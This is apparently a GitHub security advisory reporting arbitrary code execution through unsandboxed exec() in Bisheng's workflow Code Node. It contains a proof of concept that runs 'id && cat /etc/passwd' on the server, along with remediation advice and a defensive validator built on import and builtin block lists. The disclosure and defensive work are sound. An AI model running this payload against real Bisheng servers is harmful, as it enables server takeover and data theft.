[Security] Arbitrary Code Execution via Unsandboxed exec() in Workflow Code Nodes #1959

@Lihfdgjr

Security Vulnerability Report

Summary

Bisheng's workflow Code Node executes user-supplied Python code via exec() with unrestricted globals and importlib.import_module() for arbitrary imports. No sandboxing, no import restriction, no builtin restriction. Any authenticated user achieves full RCE on the server.

Severity: HIGH (CVSS 8.8)

  • CWE: CWE-94 (Code Injection)
  • Affected Component: src/backend/bisheng/workflow/nodes/code/code_parse.py lines 88-96

Vulnerable Code

# code_parse.py lines 88-96
def parse_functions(self, node: ast.FunctionDef):
    compiled_func = compile(ast.Module(body=[node], type_ignores=[]), "<string>", "exec")
    exec(compiled_func, self.exec_globals, self.exec_locals)  # Unrestricted exec

def parse_imports(self, node):
    if isinstance(node, ast.Import):
        for alias in node.names:
            self.exec_globals[alias.asname or alias.name] = importlib.import_module(alias.name)  # Any module allowed

Proof of Concept

Create a workflow with a Code Node containing:

import os
def main(**kwargs):
    return {"output": os.popen("id && cat /etc/passwd").read()}

Execute the workflow - the server runs os.popen("id && cat /etc/passwd") and returns the output.

Impact

Authenticated RCE - any user with workflow creation permissions can execute arbitrary system commands on the server, leading to:

  • Full server compromise
  • Data exfiltration
  • Lateral movement within the network

Remediation

  1. Add restricted builtins (remove __import__, eval, exec, compile, open)
  2. Implement an import allowlist blocking dangerous modules (os, subprocess, sys, shutil, etc.)
  3. Add AST validation to block dangerous function calls before execution

Note: This repo does not have private vulnerability reporting enabled via GitHub. Please consider enabling it at Settings > Security > Private vulnerability reporting.
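
The three remediation steps listed in the report, combined into one pre-execution check. This is an added example, not Bisheng's code and not part of the original report. `ALLOWED_MODULES`, `PolicyError`, `validate`, `safe_import` and `run_node` are hypothetical names, and the allowlist contents are an assumed policy.

```python
import ast
import builtins

# Assumed policy for illustration; a real deployment chooses its own lists.
ALLOWED_MODULES = {"json", "math", "re", "datetime"}
BLOCKED_BUILTINS = {"__import__", "eval", "exec", "compile", "open"}
BLOCKED_NAMES = BLOCKED_BUILTINS | {"getattr", "setattr", "globals", "vars"}


class PolicyError(Exception):
    """Raised when node code violates the execution policy."""


def validate(source: str) -> ast.Module:
    """Step 3: walk the AST and reject the code before anything runs."""
    tree = ast.parse(source)
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            names = [node.module or ""]  # relative imports have no module
        else:
            names = []
        for name in names:
            if name.split(".")[0] not in ALLOWED_MODULES:
                raise PolicyError(f"import not allowed: {name}")
        if isinstance(node, ast.Name) and node.id in BLOCKED_NAMES:
            raise PolicyError(f"name not allowed: {node.id}")
        if isinstance(node, ast.Attribute) and node.attr.startswith("__"):
            raise PolicyError(f"dunder attribute not allowed: {node.attr}")
    return tree


def safe_import(name, globals=None, locals=None, fromlist=(), level=0):
    """Step 2: allowlisting __import__, enforced again at run time."""
    if level != 0 or name.split(".")[0] not in ALLOWED_MODULES:
        raise PolicyError(f"import not allowed: {name}")
    return builtins.__import__(name, globals, locals, fromlist, level)


def run_node(source: str, **kwargs):
    """Validate, then execute main() with restricted builtins (step 1)."""
    tree = validate(source)
    safe = {k: v for k, v in vars(builtins).items() if k not in BLOCKED_BUILTINS}
    safe["__import__"] = safe_import
    env = {"__builtins__": safe}
    exec(compile(tree, "<node>", "exec"), env)
    return env["main"](**kwargs)
```

In-process restrictions like these narrow what node code can reach but are not an isolation boundary in CPython, so they belong alongside running the node in a separate low-privilege process or container.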
